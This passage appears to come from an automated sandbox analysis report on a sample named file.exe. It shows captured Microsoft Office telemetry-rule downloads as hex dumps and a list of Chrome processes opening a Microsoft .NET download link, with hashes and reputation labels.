                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:48:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:48:03 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1369
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE32FE1A2"
                                                                                                                                                                                  x-ms-request-id: 4e23fa7b-901e-0048-7ba0-3bb800000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134803Z-15b8b599d88phfhnhC1TEBr51n000000032g00000000csx5
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:48:03 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  149192.168.2.44994313.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:48:03 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:48:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:48:03 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1414
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE03B051D"
                                                                                                                                                                                  x-ms-request-id: f390f01b-d01e-0017-588c-3ab035000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134803Z-15b8b599d882hxlwhC1TEBfa5w00000002zg000000003v0y
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:48:03 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                  Start time:08:46:07
                                                                                                                                                                                  Start date:23/11/2024
                                                                                                                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                  Imagebase:0xb70000
                                                                                                                                                                                  File size:1'846'784 bytes
                                                                                                                                                                                  MD5 hash:3EBF7BB70DC746683D4274C4AF45C8AC
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                  Start time:08:46:45
                                                                                                                                                                                  Start date:23/11/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                  Imagebase:0x7ff76e190000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                  Start time:08:46:46
                                                                                                                                                                                  Start date:23/11/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1916,i,1287654970835858718,17769345937840610954,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                  Imagebase:0x7ff76e190000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                  Start time:08:46:51
                                                                                                                                                                                  Start date:23/11/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                  Imagebase:0x7ff76e190000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                  Start time:08:46:51
                                                                                                                                                                                  Start date:23/11/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2004 --field-trial-handle=1900,i,13827317004684261514,15801404464628299724,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                  Imagebase:0x7ff76e190000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  No disassembly